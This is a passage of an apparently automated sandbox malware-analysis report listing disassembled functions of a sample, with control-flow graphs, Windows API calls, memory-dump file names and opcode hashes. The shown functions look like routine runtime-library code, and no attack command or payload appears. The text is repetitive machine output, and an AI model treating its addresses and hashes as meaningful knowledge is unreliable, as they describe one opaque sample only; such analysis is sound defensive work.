                                                                                                                                                                                                                                                                                                  control_flow_graph 137 3d75ae-3d75cd 138 3d77a7 137->138 139 3d75d3-3d75d5 137->139 142 3d77a9-3d77ad 138->142 140 3d75d7-3d75f6 call 3cd388 139->140 141 3d7601-3d7627 139->141 148 3d75f9-3d75fc 140->148 144 3d762d-3d7633 141->144 145 3d7629-3d762b 141->145 144->140 147 3d7635-3d763f 144->147 145->144 145->147 149 3d764f-3d765a call 3d7132 147->149 150 3d7641-3d764c call 3d8021 147->150 148->142 155 3d769c-3d76ae 149->155 156 3d765c-3d7661 149->156 150->149 159 3d76ff-3d771f WriteFile 155->159 160 3d76b0-3d76b6 155->160 157 3d7686-3d769a call 3d6cf8 156->157 158 3d7663-3d7667 156->158 179 3d767f-3d7681 157->179 161 3d766d-3d767c call 3d70ca 158->161 162 3d776f-3d7781 158->162 164 3d772a 159->164 165 3d7721-3d7727 GetLastError 159->165 166 3d76ed-3d76f8 call 3d71b0 160->166 167 3d76b8-3d76bb 160->167 161->179 168 3d778b-3d779d 162->168 169 3d7783-3d7789 162->169 173 3d772d-3d7738 164->173 165->164 178 3d76fd 166->178 174 3d76bd-3d76c0 167->174 175 3d76db-3d76eb call 3d7374 167->175 168->148 169->138 169->168 180 3d773a-3d773f 173->180 181 3d77a2-3d77a5 173->181 174->162 182 3d76c6-3d76d1 call 3d728b 174->182 185 3d76d6-3d76d9 175->185 178->185 179->173 186 3d776d 180->186 187 3d7741-3d7746 180->187 181->142 182->185 185->179 186->162 188 3d775f-3d7768 call 3cd4cc 187->188 189 3d7748-3d775a 187->189 188->148 189->148
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D6CF8: GetConsoleOutputCP.KERNEL32(AFD2407A,00000000,00000000,00000000), ref: 003D6D5B
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,003ED348,00000000,0000000C,00000000,00000000,?,00000000,003ED348,00000010,003CEC7F,00000000,00000000,00000000), ref: 003D7717
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 003D7721
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 926969d33bb8399bec5a4cc2cf5e63ee8a8c8fd3ab5c3923939000a14c2fcfdd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 538ab86dcfc6f8d758de64e2070c90a05a0a63f6571b99105ecf644595bcf2e3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 926969d33bb8399bec5a4cc2cf5e63ee8a8c8fd3ab5c3923939000a14c2fcfdd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F619576D08149AFDF129FA8E884EEEBBB9AF09304F154556F804AB352F375D901CB60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D9B7D Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 192 3d9b7d-3d9ba5 call 3d96ad 195 3d9d6d-3d9d6e call 3d971e 192->195 196 3d9bab-3d9bb1 192->196 199 3d9d73-3d9d75 195->199 198 3d9bb4-3d9bba 196->198 200 3d9cbc-3d9cdb call 3c70c0 198->200 201 3d9bc0-3d9bcc 198->201 204 3d9d76-3d9d84 call 3c5cbb 199->204 210 3d9cde-3d9ce3 200->210 201->198 202 3d9bce-3d9bd4 201->202 205 3d9bda-3d9be6 IsValidCodePage 202->205 206 3d9cb4-3d9cb7 202->206 205->206 209 3d9bec-3d9bf3 205->209 206->204 212 3d9c1b-3d9c28 GetCPInfo 209->212 213 3d9bf5-3d9c01 209->213 214 3d9ce5-3d9cea 210->214 215 3d9d20-3d9d2a 210->215 218 3d9ca8-3d9cae 212->218 219 3d9c2a-3d9c49 call 3c70c0 212->219 216 3d9c05-3d9c11 call 3d9781 213->216 220 3d9d1d 214->220 221 3d9cec-3d9cf4 214->221 215->210 217 3d9d2c-3d9d56 call 3d966f 215->217 227 3d9c16 216->227 232 3d9d57-3d9d66 217->232 218->195 218->206 219->216 233 3d9c4b-3d9c52 219->233 220->215 225 3d9d15-3d9d1b 221->225 226 3d9cf6-3d9cf9 221->226 225->214 225->220 230 3d9cfb-3d9d01 226->230 227->199 230->225 231 3d9d03-3d9d13 230->231 231->225 231->230 232->232 234 3d9d68 232->234 235 3d9c7e-3d9c81 233->235 236 3d9c54-3d9c59 233->236 234->195 237 3d9c86-3d9c8d 235->237 236->235 238 3d9c5b-3d9c63 236->238 237->237 239 3d9c8f-3d9ca3 call 3d966f 237->239 240 3d9c65-3d9c6c 238->240 241 3d9c76-3d9c7c 238->241 239->216 243 3d9c6d-3d9c74 240->243 241->235 241->236 243->241 243->243
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D96AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 003D96D8
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,003D99C4,?,00000000,?,?,?), ref: 003D9BDE
                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,003D99C4,?,00000000,?,?,?), ref: 003D9C20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 123dffbeb49a1c3921e5cff2259f58b3f0be643ce47e161382d61dbb332b2d60
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d9a77f9000d66cc4b7f90a80e959fd00ef76de7e786763d3333dbfe4102a086
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 123dffbeb49a1c3921e5cff2259f58b3f0be643ce47e161382d61dbb332b2d60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81513372A002448FDB22CF75E8807AABBF9FF85304F15856FD0968B391E7749946CB51
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C4FA8 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 245 3c4fa8-3c4fc8 246 3c4fca-3c4fd1 call 3c4f8e 245->246 247 3c4fd3-3c4fda 245->247 255 3c5028-3c5036 call 3c5cbb 246->255 249 3c4ffc-3c5000 247->249 250 3c4fdc-3c4fe6 247->250 253 3c5025 249->253 254 3c5002-3c5011 call 3c4c04 249->254 250->249 252 3c4fe8-3c4ffa 250->252 252->255 253->255 260 3c5039-3c506e 254->260 261 3c5013-3c5017 call 3c4419 254->261 267 3c5094-3c509c 260->267 268 3c5070-3c5073 260->268 264 3c501c-3c5020 261->264 264->253 265 3c5022 264->265 265->253 270 3c509e-3c50af call 3ced08 267->270 271 3c50b5-3c50bf 267->271 268->267 269 3c5075-3c5079 268->269 269->253 273 3c507b-3c508a call 3c4419 269->273 270->253 270->271 271->253 272 3c50c5-3c50c8 271->272 272->255 273->253 278 3c508c-3c5092 273->278 278->253
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Fputc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3078413507-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a2924917e91ec9d2ee6b4bee75b88cde16ee8bd6cfe7c32fe0e0ee56cbf9cb58
                                                                                                                                                                                                                                                                                                  • Instruction ID: 211ca0bf5bc74d414e51bc1d007996d762d53c795249e7f5d056abfab6f966ad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2924917e91ec9d2ee6b4bee75b88cde16ee8bd6cfe7c32fe0e0ee56cbf9cb58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41613690062AABCF16DF65D894EEEB7B8BF08314B14415EE501EB641DB31FD94CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D71B0 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 279 3d71b0-3d7205 call 3c6a60 282 3d727a-3d728a call 3c5cbb 279->282 283 3d7207 279->283 285 3d720d 283->285 287 3d7213-3d7215 285->287 288 3d722f-3d7254 WriteFile 287->288 289 3d7217-3d721c 287->289 292 3d7256-3d7261 288->292 293 3d7272-3d7278 GetLastError 288->293 290 3d721e-3d7224 289->290 291 3d7225-3d722d 289->291 290->291 291->287 291->288 292->282 294 3d7263-3d726e 292->294 293->282 294->285 295 3d7270 294->295 295->282
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,003D76FD,00000000,00000000,00000000,?,0000000C,00000000), ref: 003D724C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,003D76FD,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,003ED348,00000010,003CEC7F,00000000,00000000), ref: 003D7272
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4688cb0b4549437ca869775aaf3f0c3fe09860a6f78b309006e595d4a9cfc240
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3695b9c577f11692b2fbc383df90e73a38bcb5a39fd425f8e8ae5a35e2098e21
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4688cb0b4549437ca869775aaf3f0c3fe09860a6f78b309006e595d4a9cfc240
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E021A032A002589BCF16CF69ED80AD9B7B9EB4C305F1444AAE906D7351E630DE428B60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D4652 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 296 3d4652-3d4657 297 3d4659-3d4671 296->297 298 3d467f-3d4688 297->298 299 3d4673-3d4677 297->299 301 3d469a 298->301 302 3d468a-3d468d 298->302 299->298 300 3d4679-3d467d 299->300 303 3d46f4-3d46f8 300->303 306 3d469c-3d46a9 GetStdHandle 301->306 304 3d468f-3d4694 302->304 305 3d4696-3d4698 302->305 303->297 307 3d46fe-3d4701 303->307 304->306 305->306 308 3d46ab-3d46ad 306->308 309 3d46d6-3d46e8 306->309 308->309 311 3d46af-3d46b8 GetFileType 308->311 309->303 310 3d46ea-3d46ed 309->310 310->303 311->309 312 3d46ba-3d46c3 311->312 313 3d46cb-3d46ce 312->313 314 3d46c5-3d46c9 312->314 313->303 315 3d46d0-3d46d4 313->315 314->303 315->303
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 003D469E
                                                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 003D46B0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c63a93900fd4f15931826daf358e318612712d4f7d806cc9ccda3092a07087b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7552d8a04c01bf01906d02125ae66ecfd0156bff8eca18f96df2f1235d67d9e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c63a93900fd4f15931826daf358e318612712d4f7d806cc9ccda3092a07087b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 381196735047914BC7328E3EAC88622BA98AB67330B39071BD1B797BF1C374D986D654
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D5916 Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 316 3d5916-3d5925 call 3d5448 319 3d594e-3d5968 call 3d5973 LCMapStringW 316->319 320 3d5927-3d594c LCMapStringEx 316->320 324 3d596e-3d5970 319->324 320->324
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNELBASE(?,003D84CD,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 003D594A
                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,003D84CD,?,?,00000000,?,00000000), ref: 003D5968
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 172dd9ddae896f89ad5777285865852e3de45fb83327d69f798bc00e6e80ad58
                                                                                                                                                                                                                                                                                                  • Instruction ID: 29859d24f8485f08e09571d1589dd4c5bc193efe46d98f6647a304fa98527f7a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 172dd9ddae896f89ad5777285865852e3de45fb83327d69f798bc00e6e80ad58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0683200055AFBCF135FA1ED059DE3E2AAB483A1F054112FA1829120C732C971AB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D9781 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 325 3d9781-3d97a3 326 3d98bc-3d98e2 325->326 327 3d97a9-3d97bb GetCPInfo 325->327 328 3d98e7-3d98ec 326->328 327->326 329 3d97c1-3d97c8 327->329 330 3d98ee-3d98f4 328->330 331 3d98f6-3d98fc 328->331 332 3d97ca-3d97d4 329->332 333 3d9904-3d9906 330->333 334 3d98fe-3d9901 331->334 335 3d9908 331->335 332->332 336 3d97d6-3d97e9 332->336 338 3d990a-3d991c 333->338 334->333 335->338 337 3d980a-3d980c 336->337 339 3d980e-3d9845 call 3d82d6 call 3d85cd 337->339 340 3d97eb-3d97f2 337->340 338->328 341 3d991e-3d992c call 3c5cbb 338->341 351 3d984a-3d987f call 3d85cd 339->351 342 3d9801-3d9803 340->342 345 3d9805-3d9808 342->345 346 3d97f4-3d97f6 342->346 345->337 346->345 349 3d97f8-3d9800 346->349 349->342 354 3d9881-3d988b 351->354 355 3d988d-3d9897 354->355 356 3d9899-3d989b 354->356 359 3d98ab-3d98b8 355->359 357 3d989d-3d98a7 356->357 358 3d98a9 356->358 357->359 358->359 359->354 360 3d98ba 359->360 360->341
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(E8458D00,?,003D99D0,003D99C4,00000000), ref: 003D97B3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1807457897-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c23a3d30a91ce1f9f073507510952dc2021dc9abcc528d73d4713efc64fd496
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0edb84f4300ed9006461e7fad304f85b52fbf4e0939f10a5da17589cfc2edc8b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c23a3d30a91ce1f9f073507510952dc2021dc9abcc528d73d4713efc64fd496
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE515C729042589ADB238F28DC84BE67BBCEB46704F2405EFE49AD7242D331AD45DF20
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C1BFF Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 003C1C06
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C2F91: std::_Lockit::_Lockit.LIBCPMT ref: 003C2F9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C2F91: int.LIBCPMT ref: 003C2FB0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C2F91: std::_Lockit::~_Lockit.LIBCPMT ref: 003C2FF9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$H_prolog3_catchLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1693569656-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 13b55d5943dfa1cbf402ac2bf804b8b9a1a48b8726fa27f9f99f90081cec6534
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cfeca8df551be9f28ec83af2a494c35cc91604fd8978034ce87b2e48ff455b4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13b55d5943dfa1cbf402ac2bf804b8b9a1a48b8726fa27f9f99f90081cec6534
